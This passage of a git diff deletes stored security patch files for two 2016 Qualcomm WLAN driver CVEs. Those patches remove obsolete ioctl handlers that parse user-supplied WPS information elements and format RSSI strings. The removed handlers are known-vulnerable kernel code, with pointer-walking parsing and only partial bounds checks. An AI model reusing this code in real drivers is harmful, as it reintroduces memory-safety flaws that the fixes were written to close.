4; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceSubCategory = (*pos<<8 | *(pos+1)); -- hddLog(LOG1, "primary dev sub category: %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceSubCategory); -- pos += 2; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_PRIMARYDEVICETYPE_PRESENT; -- break; -- case HDD_WPS_ELEM_DEVICE_NAME: -- pos += 2; -- length = *pos<<8 | *(pos+1); -- pos += 2; -- if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.text))) -- { -- ret = -EINVAL; -- goto exit; -- } -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.num_text = length; -- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.text, pos, length); -- pos += length; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_DEVICENAME_PRESENT; -- break; -- case HDD_WPS_ELEM_CONFIG_METHODS: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ConfigMethod = (*pos<<8) | *(pos+1); -- hddLog(LOG1, "Config Methods: %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SelectedRegistraCfgMethod); -- pos += 2; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_CONFIGMETHODS_PRESENT; -- break; -- -- case HDD_WPS_ELEM_RF_BANDS: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.RFBand = *pos; -- hddLog(LOG1, "RF band: %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.RFBand); -- pos += 1; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_RF_BANDS_PRESENT; -- break; -- } // switch -- } -- } -- else -- { -- hddLog (LOGE, "%s WPS IE Mismatch %X",__func__, wps_genie[0]); -- } -- -- } // switch -- } -- halStatus = WLANSAP_Set_WpsIe(pVosContext, pSap_WPSIe); -- if (halStatus != eHAL_STATUS_SUCCESS) -- ret = -EINVAL; -- pHostapdState = WLAN_HDD_GET_HOSTAP_STATE_PTR(pHostapdAdapter); -- if( pHostapdState->bCommit && WPSIeType == eQC_WPS_PROBE_RSP_IE) -- { -- //hdd_adapter_t *pHostapdAdapter = (netdev_priv(dev)); -- //v_CONTEXT_t pVosContext = pHostapdAdapter->pvosContext; -- WLANSAP_Update_WpsIe ( pVosContext ); -- } -- 
--exit: -- vos_mem_free(pSap_WPSIe); -- kfree(fwps_genie); -- EXIT(); -- return ret; --} -- --static int iw_softap_setwpsie(struct net_device *dev, -- struct iw_request_info *info, -- union iwreq_data *wrqu, -- char *extra) --{ -- int ret; -- -- vos_ssr_protect(__func__); -- ret = __iw_softap_setwpsie(dev, info, wrqu, extra); -- vos_ssr_unprotect(__func__); -- -- return ret; --} - - static int __iw_softap_stopbss(struct net_device *dev, - struct iw_request_info *info, -@@ -4845,8 +4434,6 @@ static const struct iw_priv_args hostapd_private_args[] = { - IW_PRIV_TYPE_INT | IW_PRIV_SIZE_FIXED | 1, 0, "setAclMode" }, - { QCSAP_IOCTL_GET_STAWPAIE, - IW_PRIV_TYPE_BYTE | IW_PRIV_SIZE_FIXED | 1, 0, "get_staWPAIE" }, -- { QCSAP_IOCTL_SETWPAIE, -- IW_PRIV_TYPE_BYTE | QCSAP_MAX_WSC_IE | IW_PRIV_SIZE_FIXED, 0, "setwpaie" }, - { QCSAP_IOCTL_STOPBSS, - IW_PRIV_TYPE_BYTE | IW_PRIV_SIZE_FIXED, 0, "stopbss" }, - { QCSAP_IOCTL_VERSION, 0, -@@ -4945,7 +4532,6 @@ static const iw_handler hostapd_private[] = { - [QCSAP_IOCTL_SETPARAM - SIOCIWFIRSTPRIV] = iw_softap_setparam, //set priv ioctl - [QCSAP_IOCTL_GETPARAM - SIOCIWFIRSTPRIV] = iw_softap_getparam, //get priv ioctl - [QCSAP_IOCTL_GET_STAWPAIE - SIOCIWFIRSTPRIV] = iw_get_genie, //get station genIE -- [QCSAP_IOCTL_SETWPAIE - SIOCIWFIRSTPRIV] = iw_softap_setwpsie, - [QCSAP_IOCTL_STOPBSS - SIOCIWFIRSTPRIV] = iw_softap_stopbss, // stop bss - [QCSAP_IOCTL_VERSION - SIOCIWFIRSTPRIV] = iw_softap_version, // get driver version - [QCSAP_IOCTL_GET_WPS_PBC_PROBE_REQ_IES - SIOCIWFIRSTPRIV] = iw_get_WPSPBCProbeReqIEs, --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-6679/qcacld-2.0/0002.patch b/Patches/Linux_CVEs/CVE-2016-6679/qcacld-2.0/0002.patch deleted file mode 100644 index 84609117..00000000 --- a/Patches/Linux_CVEs/CVE-2016-6679/qcacld-2.0/0002.patch +++ /dev/null 
@@ -1,478 +0,0 @@ -From f081695446679aa44baa0d00940ea18455eeb4c5 Mon Sep 17 00:00:00 2001 -From: SaidiReddy Yenuga -Date: Thu, 26 May 2016 15:24:26 +0530 -Subject: qcacld-2.0: Remove the support for setwpaie ioctl - -This ioctl gets call during the start of SAP/hostapd with wext -interface and which is obsolete, currently using nl80211 interface -for the same - -Remove the code related to setwpaie ioctl - -CRs-Fixed: 1000913 -Change-Id: Ia45860d7143639aa62d02afe8c08e283e20ba27a ---- - CORE/HDD/inc/qc_sap_ioctl.h | 2 +- - CORE/HDD/src/wlan_hdd_hostapd.c | 419 ---------------------------------------- - 2 files changed, 1 insertion(+), 420 deletions(-) - -diff --git a/CORE/HDD/inc/qc_sap_ioctl.h b/CORE/HDD/inc/qc_sap_ioctl.h -index 570e6c0..1e52ac9 100644 ---- a/CORE/HDD/inc/qc_sap_ioctl.h -+++ b/CORE/HDD/inc/qc_sap_ioctl.h -@@ -143,7 +143,7 @@ typedef struct - #define QCSAP_IOCTL_SET_NONE_GET_THREE (SIOCIWFIRSTPRIV+3) - #define WE_GET_TSF 1 - #define QCSAP_IOCTL_GET_STAWPAIE (SIOCIWFIRSTPRIV+4) --#define QCSAP_IOCTL_SETWPAIE (SIOCIWFIRSTPRIV+5) -+ - #define QCSAP_IOCTL_STOPBSS (SIOCIWFIRSTPRIV+6) - #define QCSAP_IOCTL_VERSION (SIOCIWFIRSTPRIV+7) - #define QCSAP_IOCTL_GET_WPS_PBC_PROBE_REQ_IES (SIOCIWFIRSTPRIV+8) -diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c -index 40ae5cb..dceb610 100644 ---- a/CORE/HDD/src/wlan_hdd_hostapd.c -+++ b/CORE/HDD/src/wlan_hdd_hostapd.c -@@ -5270,422 +5270,6 @@ static int iw_get_mode(struct net_device *dev, - } - - --static int __iw_softap_setwpsie(struct net_device *dev, -- struct iw_request_info *info, -- union iwreq_data *wrqu, -- char *extra) --{ -- hdd_adapter_t *pHostapdAdapter = (netdev_priv(dev)); --#ifndef WLAN_FEATURE_MBSSID -- v_CONTEXT_t pVosContext; --#endif -- hdd_hostapd_state_t *pHostapdState; -- eHalStatus halStatus= eHAL_STATUS_SUCCESS; -- u_int8_t *wps_genie; -- u_int8_t *fwps_genie; -- u_int8_t *pos; -- tpSap_WPSIE pSap_WPSIe; -- u_int8_t WPSIeType; -- u_int16_t length; -- struct 
iw_point s_priv_data; -- hdd_context_t *hdd_ctx; -- int ret; -- -- ENTER(); -- -- if (!capable(CAP_NET_ADMIN)) { -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -- FL("permission check failed")); -- return -EPERM; -- } -- -- hdd_ctx = WLAN_HDD_GET_CTX(pHostapdAdapter); -- ret = wlan_hdd_validate_context(hdd_ctx); -- if (0 != ret) -- return ret; -- --#ifndef WLAN_FEATURE_MBSSID -- pVosContext = hdd_ctx->pvosContext; -- if (NULL == pVosContext) { -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -- "%s: VOS context is not valid ", __func__); -- return -EINVAL; -- } --#endif -- -- /* helper function to get iwreq_data with compat handling. */ -- if (hdd_priv_get_data(&s_priv_data, wrqu)) { -- return -EINVAL; -- } -- -- if ((NULL == s_priv_data.pointer) || -- (s_priv_data.length < QCSAP_MAX_WSC_IE)) { -- return -EINVAL; -- } -- -- wps_genie = mem_alloc_copy_from_user_helper(s_priv_data.pointer, -- s_priv_data.length); -- -- if (NULL == wps_genie) { -- hddLog(LOG1, -- "%s: failed to alloc memory and copy data from user buffer", -- __func__); -- return -EFAULT; -- } -- -- fwps_genie = wps_genie; -- -- pSap_WPSIe = vos_mem_malloc(sizeof(tSap_WPSIE)); -- if (NULL == pSap_WPSIe) -- { -- hddLog(LOGE, "VOS unable to allocate memory"); -- kfree(fwps_genie); -- return -ENOMEM; -- } -- vos_mem_zero(pSap_WPSIe, sizeof(tSap_WPSIE)); -- -- hddLog(LOG1,"%s WPS IE type[0x%X] IE[0x%X], LEN[%d]", __func__, wps_genie[0], wps_genie[1], wps_genie[2]); -- WPSIeType = wps_genie[0]; -- if ( wps_genie[0] == eQC_WPS_BEACON_IE) -- { -- pSap_WPSIe->sapWPSIECode = eSAP_WPS_BEACON_IE; -- wps_genie = wps_genie + 1; -- switch ( wps_genie[0] ) -- { -- case DOT11F_EID_WPA: -- if (wps_genie[1] < DOT11F_EID_HEADER_LEN || -- wps_genie[1] > DOT11F_IE_WPA_MAX_LEN + DOT11F_EID_HEADER_LEN) -- { -- ret = -EINVAL; -- goto exit; -- } -- else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0) -- { -- hddLog (LOG1, "%s Set WPS BEACON IE(len %d)",__func__, wps_genie[1]+2); -- pos = &wps_genie[6]; -- 
while (((size_t)pos - (size_t)&wps_genie[6]) < (wps_genie[1] - 4) ) -- { -- switch((u_int16_t)(*pos<<8) | *(pos+1)) -- { -- case HDD_WPS_ELEM_VERSION: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.Version = *pos; -- hddLog(LOG1, "WPS version %d", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.Version); -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_VER_PRESENT; -- pos += 1; -- break; -- -- case HDD_WPS_ELEM_WPS_STATE: -- pos +=4; -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.wpsState = *pos; -- hddLog(LOG1, "WPS State %d", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.wpsState); -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_STATE_PRESENT; -- pos += 1; -- break; -- case HDD_WPS_ELEM_APSETUPLOCK: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.APSetupLocked = *pos; -- hddLog(LOG1, "AP setup lock %d", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.APSetupLocked); -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_APSETUPLOCK_PRESENT; -- pos += 1; -- break; -- case HDD_WPS_ELEM_SELECTEDREGISTRA: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.SelectedRegistra = *pos; -- hddLog(LOG1, "Selected Registra %d", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.SelectedRegistra); -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_SELECTEDREGISTRA_PRESENT; -- pos += 1; -- break; -- case HDD_WPS_ELEM_DEVICE_PASSWORD_ID: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.DevicePasswordID = (*pos<<8) | *(pos+1); -- hddLog(LOG1, "Password ID: %x", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.DevicePasswordID); -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_DEVICEPASSWORDID_PRESENT; -- pos += 2; -- break; -- case HDD_WPS_ELEM_REGISTRA_CONF_METHODS: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.SelectedRegistraCfgMethod = (*pos<<8) | *(pos+1); -- hddLog(LOG1, "Select Registra Config Methods: %x", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.SelectedRegistraCfgMethod); -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= 
WPS_BEACON_SELECTEDREGISTRACFGMETHOD_PRESENT; -- pos += 2; -- break; -- -- case HDD_WPS_ELEM_UUID_E: -- pos += 2; -- length = *pos<<8 | *(pos+1); -- pos += 2; -- if (length > sizeof(pSap_WPSIe->sapwpsie.sapWPSBeaconIE.UUID_E)) -- { -- ret = -EINVAL; -- goto exit; -- } -- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSBeaconIE.UUID_E, pos, length); -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_UUIDE_PRESENT; -- pos += length; -- break; -- case HDD_WPS_ELEM_RF_BANDS: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.RFBand = *pos; -- hddLog(LOG1, "RF band: %d", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.RFBand); -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_RF_BANDS_PRESENT; -- pos += 1; -- break; -- -- default: -- hddLog (LOGW, "UNKNOWN TLV in WPS IE(%x)", (*pos<<8 | *(pos+1))); -- ret = -EINVAL; -- goto exit; -- } -- } -- } -- else { -- hddLog (LOGE, "%s WPS IE Mismatch %X", -- __func__, wps_genie[0]); -- } -- break; -- -- default: -- hddLog (LOGE, "%s Set UNKNOWN IE %X",__func__, wps_genie[0]); -- ret = -EINVAL; -- goto exit; -- } -- } -- else if( wps_genie[0] == eQC_WPS_PROBE_RSP_IE) -- { -- pSap_WPSIe->sapWPSIECode = eSAP_WPS_PROBE_RSP_IE; -- wps_genie = wps_genie + 1; -- switch ( wps_genie[0] ) -- { -- case DOT11F_EID_WPA: -- if (wps_genie[1] < DOT11F_EID_HEADER_LEN || -- wps_genie[1] > DOT11F_IE_WPA_MAX_LEN + DOT11F_EID_HEADER_LEN) -- { -- ret = -EINVAL; -- goto exit; -- } -- else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0) -- { -- hddLog (LOG1, "%s Set WPS PROBE RSP IE(len %d)",__func__, wps_genie[1]+2); -- pos = &wps_genie[6]; -- while (((size_t)pos - (size_t)&wps_genie[6]) < (wps_genie[1] - 4) ) -- { -- switch((u_int16_t)(*pos<<8) | *(pos+1)) -- { -- case HDD_WPS_ELEM_VERSION: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Version = *pos; -- hddLog(LOG1, "WPS version %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Version); -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_VER_PRESENT; -- pos += 1; 
-- break; -- -- case HDD_WPS_ELEM_WPS_STATE: -- pos +=4; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.wpsState = *pos; -- hddLog(LOG1, "WPS State %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.wpsState); -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_STATE_PRESENT; -- pos += 1; -- break; -- case HDD_WPS_ELEM_APSETUPLOCK: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.APSetupLocked = *pos; -- hddLog(LOG1, "AP setup lock %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.APSetupLocked); -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_APSETUPLOCK_PRESENT; -- pos += 1; -- break; -- case HDD_WPS_ELEM_SELECTEDREGISTRA: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SelectedRegistra = *pos; -- hddLog(LOG1, "Selected Registra %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SelectedRegistra); -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_SELECTEDREGISTRA_PRESENT; -- pos += 1; -- break; -- case HDD_WPS_ELEM_DEVICE_PASSWORD_ID: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DevicePasswordID = (*pos<<8) | *(pos+1); -- hddLog(LOG1, "Password ID: %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DevicePasswordID); -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_DEVICEPASSWORDID_PRESENT; -- pos += 2; -- break; -- case HDD_WPS_ELEM_REGISTRA_CONF_METHODS: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SelectedRegistraCfgMethod = (*pos<<8) | *(pos+1); -- hddLog(LOG1, "Select Registra Config Methods: %x", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SelectedRegistraCfgMethod); -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_SELECTEDREGISTRACFGMETHOD_PRESENT; -- pos += 2; -- break; -- case HDD_WPS_ELEM_RSP_TYPE: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ResponseType = *pos; -- hddLog(LOG1, "Config Methods: %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ResponseType); -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_RESPONSETYPE_PRESENT; -- pos += 1; -- 
break; -- case HDD_WPS_ELEM_UUID_E: -- pos += 2; -- length = *pos<<8 | *(pos+1); -- pos += 2; -- if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.UUID_E))) -- { -- ret = -EINVAL; -- goto exit; -- } -- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.UUID_E, pos, length); -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_UUIDE_PRESENT; -- pos += length; -- break; -- -- case HDD_WPS_ELEM_MANUFACTURER: -- pos += 2; -- length = *pos<<8 | *(pos+1); -- pos += 2; -- if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.name))) -- { -- ret = -EINVAL; -- goto exit; -- } -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.num_name = length; -- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.name, pos, length); -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MANUFACTURE_PRESENT; -- pos += length; -- break; -- -- case HDD_WPS_ELEM_MODEL_NAME: -- pos += 2; -- length = *pos<<8 | *(pos+1); -- pos += 2; -- if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.text))) -- { -- ret = -EINVAL; -- goto exit; -- } -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.num_text = length; -- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.text, pos, length); -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MODELNAME_PRESENT; -- pos += length; -- break; -- case HDD_WPS_ELEM_MODEL_NUM: -- pos += 2; -- length = *pos<<8 | *(pos+1); -- pos += 2; -- if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.text))) -- { -- ret = -EINVAL; -- goto exit; -- } -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.num_text = length; -- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.text, pos, length); -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MODELNUMBER_PRESENT; -- pos += length; -- break; -- case HDD_WPS_ELEM_SERIAL_NUM: -- pos += 2; -- length = *pos<<8 | *(pos+1); -- pos += 2; -- if (length > 
(sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.text))) -- { -- ret = -EINVAL; -- goto exit; -- } -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.num_text = length; -- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.text, pos, length); -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_SERIALNUMBER_PRESENT; -- pos += length; -- break; -- case HDD_WPS_ELEM_PRIMARY_DEVICE_TYPE: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.PrimaryDeviceCategory = (*pos<<8 | *(pos+1)); -- hddLog(LOG1, "primary dev category: %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.PrimaryDeviceCategory); -- pos += 2; -- -- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.PrimaryDeviceOUI, pos, HDD_WPS_DEVICE_OUI_LEN); -- hddLog(LOG1, "primary dev oui: %02x, %02x, %02x, %02x", pos[0], pos[1], pos[2], pos[3]); -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceSubCategory = (*pos<<8 | *(pos+1)); -- hddLog(LOG1, "primary dev sub category: %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceSubCategory); -- pos += 2; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_PRIMARYDEVICETYPE_PRESENT; -- break; -- case HDD_WPS_ELEM_DEVICE_NAME: -- pos += 2; -- length = *pos<<8 | *(pos+1); -- pos += 2; -- if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.text))) -- { -- ret = -EINVAL; -- goto exit; -- } -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.num_text = length; -- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.text, pos, length); -- pos += length; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_DEVICENAME_PRESENT; -- break; -- case HDD_WPS_ELEM_CONFIG_METHODS: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ConfigMethod = (*pos<<8) | *(pos+1); -- hddLog(LOG1, "Config Methods: %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SelectedRegistraCfgMethod); -- pos += 2; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_CONFIGMETHODS_PRESENT; -- 
break; -- -- case HDD_WPS_ELEM_RF_BANDS: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.RFBand = *pos; -- hddLog(LOG1, "RF band: %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.RFBand); -- pos += 1; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_RF_BANDS_PRESENT; -- break; -- } // switch -- } -- } -- else -- { -- hddLog (LOGE, "%s WPS IE Mismatch %X",__func__, wps_genie[0]); -- } -- -- } // switch -- } -- --#ifdef WLAN_FEATURE_MBSSID -- halStatus = WLANSAP_Set_WpsIe(WLAN_HDD_GET_SAP_CTX_PTR(pHostapdAdapter), pSap_WPSIe); --#else -- halStatus = WLANSAP_Set_WpsIe(pVosContext, pSap_WPSIe); --#endif -- if (halStatus != eHAL_STATUS_SUCCESS) -- ret = -EINVAL; -- pHostapdState = WLAN_HDD_GET_HOSTAP_STATE_PTR(pHostapdAdapter); -- if( pHostapdState->bCommit && WPSIeType == eQC_WPS_PROBE_RSP_IE) -- { -- //hdd_adapter_t *pHostapdAdapter = (netdev_priv(dev)); -- //v_CONTEXT_t pVosContext = pHostapdAdapter->pvosContext; --#ifdef WLAN_FEATURE_MBSSID -- WLANSAP_Update_WpsIe ( WLAN_HDD_GET_SAP_CTX_PTR(pHostapdAdapter) ); --#else -- WLANSAP_Update_WpsIe ( pVosContext ); --#endif -- } --exit: -- vos_mem_free(pSap_WPSIe); -- kfree(fwps_genie); -- EXIT(); -- return ret; --} -- --static int iw_softap_setwpsie(struct net_device *dev, -- struct iw_request_info *info, -- union iwreq_data *wrqu, -- char *extra) --{ -- int ret; -- -- vos_ssr_protect(__func__); -- ret = __iw_softap_setwpsie(dev, info, wrqu, extra); -- vos_ssr_unprotect(__func__); -- -- return ret; --} -- - static int __iw_softap_stopbss(struct net_device *dev, - struct iw_request_info *info, - union iwreq_data *wrqu, -@@ -6752,8 +6336,6 @@ static const struct iw_priv_args hostapd_private_args[] = { - - { QCSAP_IOCTL_GET_STAWPAIE, - IW_PRIV_TYPE_BYTE | IW_PRIV_SIZE_FIXED | 1, 0, "get_staWPAIE" }, -- { QCSAP_IOCTL_SETWPAIE, -- IW_PRIV_TYPE_BYTE | QCSAP_MAX_WSC_IE | IW_PRIV_SIZE_FIXED, 0, "setwpaie" }, - { QCSAP_IOCTL_STOPBSS, - IW_PRIV_TYPE_BYTE | IW_PRIV_SIZE_FIXED, 0, "stopbss" }, - { 
QCSAP_IOCTL_VERSION, 0, -@@ -6928,7 +6510,6 @@ static const iw_handler hostapd_private[] = { - [QCSAP_IOCTL_GETPARAM - SIOCIWFIRSTPRIV] = iw_softap_getparam, //get priv ioctl - [QCSAP_IOCTL_SET_NONE_GET_THREE - SIOCIWFIRSTPRIV] = iw_softap_get_three, - [QCSAP_IOCTL_GET_STAWPAIE - SIOCIWFIRSTPRIV] = iw_get_genie, //get station genIE -- [QCSAP_IOCTL_SETWPAIE - SIOCIWFIRSTPRIV] = iw_softap_setwpsie, - [QCSAP_IOCTL_STOPBSS - SIOCIWFIRSTPRIV] = iw_softap_stopbss, // stop bss - [QCSAP_IOCTL_VERSION - SIOCIWFIRSTPRIV] = iw_softap_version, // get driver version - [QCSAP_IOCTL_GET_WPS_PBC_PROBE_REQ_IES - SIOCIWFIRSTPRIV] = iw_get_WPSPBCProbeReqIEs, --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-6680/prima/0001.patch b/Patches/Linux_CVEs/CVE-2016-6680/prima/0001.patch deleted file mode 100644 index 97b3afb3..00000000 --- a/Patches/Linux_CVEs/CVE-2016-6680/prima/0001.patch +++ /dev/null 
@@ -1,471 +0,0 @@ -From 08ce2a9e1ccdf6081fc1efb47d2edea4f4ad2ecf Mon Sep 17 00:00:00 2001 -From: SaidiReddy Yenuga -Date: Tue, 9 Aug 2016 18:19:04 +0530 -Subject: wlan: Remove the support for iw_set_priv ioctl - -iw_set_priv is obsolete, now hdd_ioctl handles the -driver commands. - -Remove the code related to iw_set_priv ioctl - -CRs-Fixed: 1048052 -Change-Id: I3e50fdc2f648ace1b6c260e3d579d93d8e546446 ---- - CORE/HDD/src/wlan_hdd_wext.c | 427 +------------------------------------------ - 1 file changed, 1 insertion(+), 426 deletions(-) - -diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c -index 255a723..3ab228d 100644 ---- a/CORE/HDD/src/wlan_hdd_wext.c -+++ b/CORE/HDD/src/wlan_hdd_wext.c -@@ -3765,69 +3765,6 @@ static int iw_get_linkspeed_priv(struct net_device *dev, - } - - /* -- * Support for the RSSI & RSSI-APPROX private commands -- * Per the WiFi framework the response must be of the form -- * " rssi " -- * unless we are not associated, in which case the response is -- * "OK" -- */ --static int iw_get_rssi(struct net_device *dev, -- struct iw_request_info *info, -- union iwreq_data *wrqu, char *extra) --{ -- hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev); -- char *cmd = extra; -- int len = wrqu->data.length; -- v_S7_t s7Rssi = 0; -- hdd_station_ctx_t *pHddStaCtx = WLAN_HDD_GET_STATION_CTX_PTR(pAdapter); -- int ssidlen = pHddStaCtx->conn_info.SSID.SSID.length; -- VOS_STATUS vosStatus; -- int rc; -- -- if ((eConnectionState_Associated != pHddStaCtx->conn_info.connState) || -- (0 == ssidlen) || (ssidlen >= len)) -- { -- /* we are not connected or our SSID is too long -- so we cannot report an rssi */ -- rc = scnprintf(cmd, len, "OK"); -- } -- else -- { -- /* we are connected with a valid SSID -- so we can write the SSID into the return buffer -- (note that it is not NUL-terminated) */ -- memcpy(cmd, pHddStaCtx->conn_info.SSID.SSID.ssId, ssidlen ); -- -- vosStatus = wlan_hdd_get_rssi(pAdapter, &s7Rssi); -- -- if (VOS_STATUS_SUCCESS 
== vosStatus) -- { -- /* append the rssi to the ssid in the format required by -- the WiFI Framework */ -- rc = scnprintf(&cmd[ssidlen], len - ssidlen, " rssi %d", s7Rssi); -- rc += ssidlen; -- } -- else -- { -- rc = -1; -- } -- } -- -- /* verify that we wrote a valid response */ -- if ((rc < 0) || (rc >= len)) -- { -- // encoding or length error? -- hddLog(VOS_TRACE_LEVEL_ERROR, -- "%s: Unable to encode RSSI, got [%s]", -- __func__, cmd); -- return -EIO; -- } -- -- /* a value is being successfully returned */ -- return rc; --} -- --/* - * Support for SoftAP channel range private command - */ - static int iw_softap_set_channel_range( struct net_device *dev, -@@ -4262,368 +4199,6 @@ void* wlan_hdd_change_country_code_callback(void *pAdapter) - return NULL; - } - --static int __iw_set_priv(struct net_device *dev, -- struct iw_request_info *info, -- union iwreq_data *wrqu, char *extra) --{ -- hdd_adapter_t 